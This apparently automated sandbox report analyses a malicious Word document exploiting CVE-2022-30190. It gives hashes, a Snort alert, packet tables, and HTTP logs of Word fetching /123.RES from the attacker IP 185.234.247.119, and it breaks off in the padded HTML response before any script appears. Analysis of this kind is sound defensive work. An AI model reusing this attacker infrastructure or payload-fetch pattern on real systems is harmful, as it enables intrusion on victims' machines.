                                                                                                                                                                      • ZIP compressed archive (8000/1) 7.92%
                                                                                                                                                                      File name:doc782.docx
                                                                                                                                                                      File size:10144
                                                                                                                                                                      MD5:e7015438268464cedad98b1544d643ad
                                                                                                                                                                      SHA1:03ef0e06d678a07f0413d95f0deb8968190e4f6b
                                                                                                                                                                      SHA256:d20120cc046cef3c3f0292c6cbc406fcf2a714aa8e048c9188f1184e4bb16c93
                                                                                                                                                                      SHA512:d134d87c28acb758b897a287a9f6ce86776f384f43ee963f52b40e173b6bfcd9dc76e5f64b9a40b93d3bf2a5b988f842c27c90611a8b4408abd9e197191e4aad
                                                                                                                                                                      SSDEEP:192:s5VReDWRPj8Iugw1Blb8VPkf+CFk4v1Y2VveFLC9FJ9Q7dlpN2:snPj8I10lD9+2Vvx9qlpN2
                                                                                                                                                                      TLSH:A3228E3ADA5508B5CAD2A275E0AC0B2AD30C42BBB73BE9CB65C653E402C85DB0F5530C
                                                                                                                                                                      File Content Preview:PK.........k.T...L....'.......[Content_Types].xml...n.0.E....m.NR....,.X...~...`.l.....C ......l....sg..'.m..kp^...Q4d...H..1.X...,.(.......x6..L.;.>.b.c.!...}.A!|d,h.....i.....K,....;....1.R.M'O..U....^WF.....Ub....6W.@.....(aM..r..3e....?J(#....7..S...p

                                                                                                                                                                      File Icon

                                                                                                                                                                      Icon Hash:74fcd0d2d6d6d0cc

                                                                                                                                                                      Network Behavior

                                                                                                                                                                      Snort IDS Alerts

                                                                                                                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                      185.234.247.119192.168.2.2280491712036726 06/07/22-19:44:37.058628TCP2036726ET EXPLOIT Possible Microsoft Support Diagnostic Tool Exploitation Inbound (CVE-2022-30190)8049171185.234.247.119192.168.2.22

                                                                                                                                                                      Network Port Distribution

                                                                                                                                                                      TCP Packets

                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                      Jun 7, 2022 19:50:11.678486109 CEST4974480192.168.2.5185.234.247.119
                                                                                                                                                                      Jun 7, 2022 19:50:11.706741095 CEST8049744185.234.247.119192.168.2.5
                                                                                                                                                                      Jun 7, 2022 19:50:11.707032919 CEST4974480192.168.2.5185.234.247.119
                                                                                                                                                                      Jun 7, 2022 19:50:11.720185995 CEST4974480192.168.2.5185.234.247.119
                                                                                                                                                                      Jun 7, 2022 19:50:11.748521090 CEST8049744185.234.247.119192.168.2.5
                                                                                                                                                                      Jun 7, 2022 19:50:11.748681068 CEST8049744185.234.247.119192.168.2.5
                                                                                                                                                                      Jun 7, 2022 19:50:11.868760109 CEST4974480192.168.2.5185.234.247.119
                                                                                                                                                                      Jun 7, 2022 19:50:11.900027037 CEST8049744185.234.247.119192.168.2.5
                                                                                                                                                                      Jun 7, 2022 19:50:12.080867052 CEST4974480192.168.2.5185.234.247.119
                                                                                                                                                                      Jun 7, 2022 19:50:14.981090069 CEST4974480192.168.2.5185.234.247.119
                                                                                                                                                                      Jun 7, 2022 19:50:15.009474993 CEST8049744185.234.247.119192.168.2.5
                                                                                                                                                                      Jun 7, 2022 19:50:15.062145948 CEST4976380192.168.2.5185.234.247.119
                                                                                                                                                                      Jun 7, 2022 19:50:15.081763029 CEST4974480192.168.2.5185.234.247.119
                                                                                                                                                                      Jun 7, 2022 19:50:15.090497017 CEST8049763185.234.247.119192.168.2.5
                                                                                                                                                                      Jun 7, 2022 19:50:15.090615988 CEST4976380192.168.2.5185.234.247.119
                                                                                                                                                                      Jun 7, 2022 19:50:15.090852022 CEST4976380192.168.2.5185.234.247.119
                                                                                                                                                                      Jun 7, 2022 19:50:15.118818998 CEST8049763185.234.247.119192.168.2.5
                                                                                                                                                                      Jun 7, 2022 19:50:15.119044065 CEST8049763185.234.247.119192.168.2.5
                                                                                                                                                                      Jun 7, 2022 19:50:15.119088888 CEST8049763185.234.247.119192.168.2.5
                                                                                                                                                                      Jun 7, 2022 19:50:15.119126081 CEST8049763185.234.247.119192.168.2.5
                                                                                                                                                                      Jun 7, 2022 19:50:15.119158983 CEST4976380192.168.2.5185.234.247.119
                                                                                                                                                                      Jun 7, 2022 19:50:15.119165897 CEST8049763185.234.247.119192.168.2.5
                                                                                                                                                                      Jun 7, 2022 19:50:15.119193077 CEST4976380192.168.2.5185.234.247.119
                                                                                                                                                                      Jun 7, 2022 19:50:15.119196892 CEST4976380192.168.2.5185.234.247.119
                                                                                                                                                                      Jun 7, 2022 19:50:15.119206905 CEST8049763185.234.247.119192.168.2.5
                                                                                                                                                                      Jun 7, 2022 19:50:15.119216919 CEST4976380192.168.2.5185.234.247.119
                                                                                                                                                                      Jun 7, 2022 19:50:15.119255066 CEST4976380192.168.2.5185.234.247.119
                                                                                                                                                                      Jun 7, 2022 19:50:15.351569891 CEST4976380192.168.2.5185.234.247.119
                                                                                                                                                                      Jun 7, 2022 19:50:15.383161068 CEST8049763185.234.247.119192.168.2.5
                                                                                                                                                                      Jun 7, 2022 19:50:15.383297920 CEST4976380192.168.2.5185.234.247.119
                                                                                                                                                                      Jun 7, 2022 19:50:15.592542887 CEST4976380192.168.2.5185.234.247.119
                                                                                                                                                                      Jun 7, 2022 19:50:15.620670080 CEST8049763185.234.247.119192.168.2.5
                                                                                                                                                                      Jun 7, 2022 19:50:15.620789051 CEST4976380192.168.2.5185.234.247.119
                                                                                                                                                                      Jun 7, 2022 19:50:15.701190948 CEST4974480192.168.2.5185.234.247.119
                                                                                                                                                                      Jun 7, 2022 19:50:15.729496002 CEST8049744185.234.247.119192.168.2.5
                                                                                                                                                                      Jun 7, 2022 19:50:15.765372038 CEST4974480192.168.2.5185.234.247.119
                                                                                                                                                                      Jun 7, 2022 19:50:15.793732882 CEST8049744185.234.247.119192.168.2.5
                                                                                                                                                                      Jun 7, 2022 19:50:15.807533026 CEST4976380192.168.2.5185.234.247.119
                                                                                                                                                                      Jun 7, 2022 19:50:15.836622953 CEST8049763185.234.247.119192.168.2.5
                                                                                                                                                                      Jun 7, 2022 19:50:15.836743116 CEST4976380192.168.2.5185.234.247.119
                                                                                                                                                                      Jun 7, 2022 19:50:15.843090057 CEST4976380192.168.2.5185.234.247.119
                                                                                                                                                                      Jun 7, 2022 19:50:15.871623039 CEST8049763185.234.247.119192.168.2.5
                                                                                                                                                                      Jun 7, 2022 19:50:15.871742010 CEST4976380192.168.2.5185.234.247.119
                                                                                                                                                                      Jun 7, 2022 19:50:15.893604040 CEST4974480192.168.2.5185.234.247.119
                                                                                                                                                                      Jun 7, 2022 19:50:16.061703920 CEST4976380192.168.2.5185.234.247.119
                                                                                                                                                                      Jun 7, 2022 19:50:16.090388060 CEST8049763185.234.247.119192.168.2.5
                                                                                                                                                                      Jun 7, 2022 19:50:16.090501070 CEST4976380192.168.2.5185.234.247.119
                                                                                                                                                                      Jun 7, 2022 19:50:18.555954933 CEST4976380192.168.2.5185.234.247.119
                                                                                                                                                                      Jun 7, 2022 19:50:18.584733009 CEST8049763185.234.247.119192.168.2.5
                                                                                                                                                                      Jun 7, 2022 19:50:18.584845066 CEST4976380192.168.2.5185.234.247.119
                                                                                                                                                                      Jun 7, 2022 19:51:20.797236919 CEST8049744185.234.247.119192.168.2.5
                                                                                                                                                                      Jun 7, 2022 19:51:20.797388077 CEST4974480192.168.2.5185.234.247.119
                                                                                                                                                                      Jun 7, 2022 19:51:20.797696114 CEST4974480192.168.2.5185.234.247.119
                                                                                                                                                                      Jun 7, 2022 19:51:20.825763941 CEST8049744185.234.247.119192.168.2.5
                                                                                                                                                                      Jun 7, 2022 19:51:23.583709002 CEST8049763185.234.247.119192.168.2.5
                                                                                                                                                                      Jun 7, 2022 19:51:23.583813906 CEST4976380192.168.2.5185.234.247.119
                                                                                                                                                                      Jun 7, 2022 19:51:26.241899014 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                      Jun 7, 2022 19:51:26.270068884 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                      Jun 7, 2022 19:51:26.270190001 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                      Jun 7, 2022 19:51:26.283952951 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                      Jun 7, 2022 19:51:26.314517975 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                      Jun 7, 2022 19:51:26.452574015 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                      Jun 7, 2022 19:51:26.452677011 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                      Jun 7, 2022 19:51:26.452698946 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                      Jun 7, 2022 19:51:26.452717066 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                      Jun 7, 2022 19:51:26.452734947 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                      Jun 7, 2022 19:51:26.452752113 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                      Jun 7, 2022 19:51:26.452755928 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                      Jun 7, 2022 19:51:26.452764988 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                      Jun 7, 2022 19:51:26.452784061 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                      Jun 7, 2022 19:51:26.452789068 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                      Jun 7, 2022 19:51:26.452800035 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                      Jun 7, 2022 19:51:26.452855110 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                      Jun 7, 2022 19:51:26.480300903 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                      Jun 7, 2022 19:51:26.480334044 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                      Jun 7, 2022 19:51:26.480350971 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                      Jun 7, 2022 19:51:26.480364084 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                      Jun 7, 2022 19:51:26.480380058 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                      Jun 7, 2022 19:51:26.480396032 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                      Jun 7, 2022 19:51:26.480412006 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                      Jun 7, 2022 19:51:26.480417013 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                      Jun 7, 2022 19:51:26.480441093 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                      Jun 7, 2022 19:51:26.480446100 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                      Jun 7, 2022 19:51:26.480458021 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                      Jun 7, 2022 19:51:26.480494976 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                      Jun 7, 2022 19:51:26.480514050 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                      Jun 7, 2022 19:51:26.480530977 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                      Jun 7, 2022 19:51:26.480539083 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                      Jun 7, 2022 19:51:26.480545998 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                      Jun 7, 2022 19:51:26.480547905 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                      Jun 7, 2022 19:51:26.480560064 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                      Jun 7, 2022 19:51:26.480565071 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                      Jun 7, 2022 19:51:26.480583906 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                      Jun 7, 2022 19:51:26.480596066 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                      Jun 7, 2022 19:51:26.480602026 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                      Jun 7, 2022 19:51:26.480616093 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                      Jun 7, 2022 19:51:26.480638027 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                      Jun 7, 2022 19:51:26.480659962 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                      Jun 7, 2022 19:51:26.484757900 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                      Jun 7, 2022 19:51:26.484778881 CEST8049865185.234.247.119192.168.2.5

                                                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                                                      • 185.234.247.119

                                                                                                                                                                      HTTP Packets

                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      0192.168.2.549744185.234.247.11980C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                      Jun 7, 2022 19:50:11.720185995 CEST472OUTOPTIONS / HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Authorization: Bearer
                                                                                                                                                                      User-Agent: Microsoft Office Word 2014
                                                                                                                                                                      X-Office-Major-Version: 16
                                                                                                                                                                      X-MS-CookieUri-Requested: t
                                                                                                                                                                      X-FeatureVersion: 1
                                                                                                                                                                      X-MSGETWEBURL: t
                                                                                                                                                                      X-IDCRL_ACCEPTED: t
                                                                                                                                                                      Host: 185.234.247.119
                                                                                                                                                                      Jun 7, 2022 19:50:11.748681068 CEST473INHTTP/1.1 405 Not Allowed
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Tue, 07 Jun 2022 17:50:11 GMT
                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                      Content-Length: 150
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                      Jun 7, 2022 19:50:11.868760109 CEST483OUTHEAD /123.RES HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Authorization: Bearer
                                                                                                                                                                      User-Agent: Microsoft Office Word 2014
                                                                                                                                                                      X-Office-Major-Version: 16
                                                                                                                                                                      X-MS-CookieUri-Requested: t
                                                                                                                                                                      X-FeatureVersion: 1
                                                                                                                                                                      X-IDCRL_ACCEPTED: t
                                                                                                                                                                      Host: 185.234.247.119
                                                                                                                                                                      Jun 7, 2022 19:50:11.900027037 CEST483INHTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Tue, 07 Jun 2022 17:50:11 GMT
                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                      Content-Length: 6241
                                                                                                                                                                      Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      ETag: "6299dd5d-1861"
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      Jun 7, 2022 19:50:14.981090069 CEST937OUTOPTIONS / HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Authorization: Bearer
                                                                                                                                                                      User-Agent: Microsoft Office Word 2014
                                                                                                                                                                      X-Office-Major-Version: 16
                                                                                                                                                                      X-MS-CookieUri-Requested: t
                                                                                                                                                                      X-FeatureVersion: 1
                                                                                                                                                                      X-MSGETWEBURL: t
                                                                                                                                                                      X-IDCRL_ACCEPTED: t
                                                                                                                                                                      Host: 185.234.247.119
                                                                                                                                                                      Jun 7, 2022 19:50:15.009474993 CEST937INHTTP/1.1 405 Not Allowed
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Tue, 07 Jun 2022 17:50:14 GMT
                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                      Content-Length: 150
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                      Jun 7, 2022 19:50:15.701190948 CEST1301OUTOPTIONS / HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Authorization: Bearer
                                                                                                                                                                      User-Agent: Microsoft Office Word 2014
                                                                                                                                                                      X-Office-Major-Version: 16
                                                                                                                                                                      X-MS-CookieUri-Requested: t
                                                                                                                                                                      X-FeatureVersion: 1
                                                                                                                                                                      X-MSGETWEBURL: t
                                                                                                                                                                      X-IDCRL_ACCEPTED: t
                                                                                                                                                                      Host: 185.234.247.119
                                                                                                                                                                      Jun 7, 2022 19:50:15.729496002 CEST1302INHTTP/1.1 405 Not Allowed
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Tue, 07 Jun 2022 17:50:15 GMT
                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                      Content-Length: 150
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                      Jun 7, 2022 19:50:15.765372038 CEST1302OUTHEAD /123.RES HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Authorization: Bearer
                                                                                                                                                                      User-Agent: Microsoft Office Word 2014
                                                                                                                                                                      X-Office-Major-Version: 16
                                                                                                                                                                      X-MS-CookieUri-Requested: t
                                                                                                                                                                      X-FeatureVersion: 1
                                                                                                                                                                      X-IDCRL_ACCEPTED: t
                                                                                                                                                                      Host: 185.234.247.119
                                                                                                                                                                      Jun 7, 2022 19:50:15.793732882 CEST1302INHTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Tue, 07 Jun 2022 17:50:15 GMT
                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                      Content-Length: 6241
                                                                                                                                                                      Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      ETag: "6299dd5d-1861"
                                                                                                                                                                      Accept-Ranges: bytes


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      1192.168.2.549763185.234.247.11980C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                      Jun 7, 2022 19:50:15.090852022 CEST938OUTGET /123.RES HTTP/1.1
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                      Host: 185.234.247.119
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Jun 7, 2022 19:50:15.119044065 CEST939INHTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Tue, 07 Jun 2022 17:50:15 GMT
                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                      Content-Length: 6241
                                                                                                                                                                      Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      ETag: "6299dd5d-1861"
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 0d 0a 47 6f 6f 64 20 74 68 69 6e 67 20 77 65 20 64 69 73 61 62 6c 65 64 20 6d 61 63 72 6f 73 0d 0a 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 70 3e 0d 0a 4c 6f 72 65 6d 20 69 70 73 75 6d 20 64 6f 6c 6f 72 20 73 69 74 20 61 6d 65 74 2c 20 63 6f 6e 73 65 63 74 65 74 75 72 20 61 64 69 70 69 73 63 69 6e 67 20 65 6c 69 74 2e 20 51 75 69 73 71 75 65 20 70 65 6c 6c 65 6e 74 65 73 71 75 65 20 65 67 65 73 74 61 73 20 6e 75 6c 6c 61 20 69 6e 20 64 69 67 6e 69 73 73 69 6d 2e 20 4e 61 6d 20 69 64 20 6d 61 75 72 69 73 20 6c 6f 72 65 6d 2e 20 4e 75 6e 63 20 73 75 73 63 69 70 69 74 20 69 64 20 6d 61 67 6e 61 20 69 64 20 6d 6f 6c 6c 69 73 2e 20 50 65 6c 6c 65 6e 74 65 73 71 75 65 20 73 75 73 63 69 70 69 74 20 6f 72 63 69 20 6e 65 71 75 65 2c 20 61 74 20 6f 72 6e 61 72 65 20 73 61 70 69 65 6e 20 62 69 62 65 6e 64 75 6d 20 65 75 2e 20 56 65 73 74 69 62 75 6c 75 6d 20 6d 61 6c 65 73 75 61 64 61 20 6e 65 63 20 73 65 6d 20 71 75 69 73 20 66 69 6e 69 62 75 73 2e 20 4e 61 6d 20 71 75 69 73 20 6c 69 67 75 6c 61 20 65 74 20 64 75 69 20 66 61 75 63 69 62 75 73 20 66 61 75 63 69 62 75 73 2e 20 49 6e 20 71 75 69 73 20 62 69 62 65 6e 64 75 6d 20 74 6f 72 74 6f 72 2e 0d 0a 0d 0a 43 75 72 61 62 69 74 75 72 20 72 75 74 72 75 6d 20 6c 65 6f 20 74 6f 72 74 6f 72 2c 20 76 65 6e 65 6e 61 74 69 73 20 66 65 72 6d 65 6e 74 75 6d 20 65 78 20 70 6f 72 74 74 69 74 6f 72 20 76 69 74 61 65 2e 20 50 72 6f 69 6e 20 65 75 20 69 6d 70 65 72 64 69 65 74 20 6c 6f 72 65 6d 2c 20 61 63 20 61 6c 69 71 75 65 74 20 72 69 73 75 73 2e 20 41 65 6e 65 61 6e 20 65 75 20 73 61 70 69 65 6e 20 70 68 61 72 65 74 72 61 2c 20 69 6d 70 65 72 64 69 65 74 20 69 70 73 75 6d 20 75 74 2c 20 73 65 6d 70 65 72 20 64 69 61 6d 2e 20 4e 75 6c 6c 61 20 66 61 63 69 6c 69 73 69 2e 20 53 65 64 20 65 75 69 73 6d 6f 64 20 74 6f 72 74 6f 72 20 74 6f 72 74 6f 72 2c 20 6e 6f 6e 20 65 6c 65 69 66 65 6e 64 20 6e 75 6e 63 20 66 65 72 6d 65 6e 74 75 6d 20 73 69 74 20 61 6d 65 74 2e 20 49 6e 74 65 67 65 72 20 6c 69 67 75 6c 61 20 6c 69 67 75 6c 61 2c 20 63 6f 6e 67 75 65 20 61 74 20 73 63 65 6c 65 72 69 73 71 75 65 20 73 69 74 20 61 6d 65 74 2c 20 70 6f 72 74 74 69 74 6f 72 20 71 75 69 73 20 66 65 6c 69 73 2e 20 4d 61 65 63 65 6e 61 73 20 6e 65 63 20 6a 75 73 74 6f 20 76 61 72 69 75 73 2c 20 73 65 6d 70 65 72 20 74 75 72 70 69 73 20 75 74 2c 20 67 72 61 76 69 64 61 20 6c 6f 72 65 6d 2e 20 50 72 6f 69 6e 20 61 72 63 75 20 6c 69 67 75 6c 61 2c 20 76 65 6e 65 6e 61 74 69 73 20 61 6c 69 71 75 61 6d 20 74 72 69 73 74 69 71 75 65 20 75 74 2c 20 70 72 65 74 69 75 6d 20 71 75 69 73 20 76 65 6c 69 74 2e 0d 0a 0d 0a 50 68 61 73 65 6c 6c 75 73 20 74 72 69 73 74 69 71 75 65 20 6f 72 63 69 20 65 6e 69 6d 2c 20 61 74 20 61 63 63 75 6d 73 61 6e 20 76 65 6c 69 74 20 69 6e 74 65 72 64 75 6d 20 65 74 2e 20 41 65 6e 65 61 6e 20 6e 65 63 20 74 72 69 73 74 69 71 75 65 20 61 6e 74 65 2c 20 64 69 67 6e 69 73 73 69 6d 20 63 6f 6e 76 61 6c 6c 69 73 20 6c 69 67 75 6c 61 2e 20 41 65 6e 65 61 6e 20 71 75 69 73 20 66 65 6c 69 73 20 64 6f 6c 6f 72 2e 20 49 6e 20 71 75 69 73 20 6c 65 63 74 75 73 20 6d 61 73 73 61 2e 20 50 65 6c 6c 65 6e 74 65
                                                                                                                                                                      Data Ascii: <!doctype html><html lang="en"><head><title>Good thing we disabled macros</title></head><body><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique ante, dignissim convallis ligula. Aenean quis felis dolor. In quis lectus massa. Pellente
                                                                                                                                                                      Jun 7, 2022 19:50:15.351569891 CEST945OUTHEAD /123.RES HTTP/1.1
                                                                                                                                                                      Authorization: Bearer
                                                                                                                                                                      X-MS-CookieUri-Requested: t
                                                                                                                                                                      X-IDCRL_ACCEPTED: t
                                                                                                                                                                      User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                      Host: 185.234.247.119
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Jun 7, 2022 19:50:15.383161068 CEST945INHTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Tue, 07 Jun 2022 17:50:15 GMT
                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                      Content-Length: 6241
                                                                                                                                                                      Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      ETag: "6299dd5d-1861"
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      Jun 7, 2022 19:50:15.592542887 CEST1193OUTHEAD /123.RES HTTP/1.1
                                                                                                                                                                      Authorization: Bearer
                                                                                                                                                                      X-MS-CookieUri-Requested: t
                                                                                                                                                                      X-IDCRL_ACCEPTED: t
                                                                                                                                                                      User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                      Host: 185.234.247.119
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Jun 7, 2022 19:50:15.620670080 CEST1301INHTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Tue, 07 Jun 2022 17:50:15 GMT
                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                      Content-Length: 6241
                                                                                                                                                                      Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      ETag: "6299dd5d-1861"
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      Jun 7, 2022 19:50:15.807533026 CEST1303OUTGET /123.RES HTTP/1.1
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
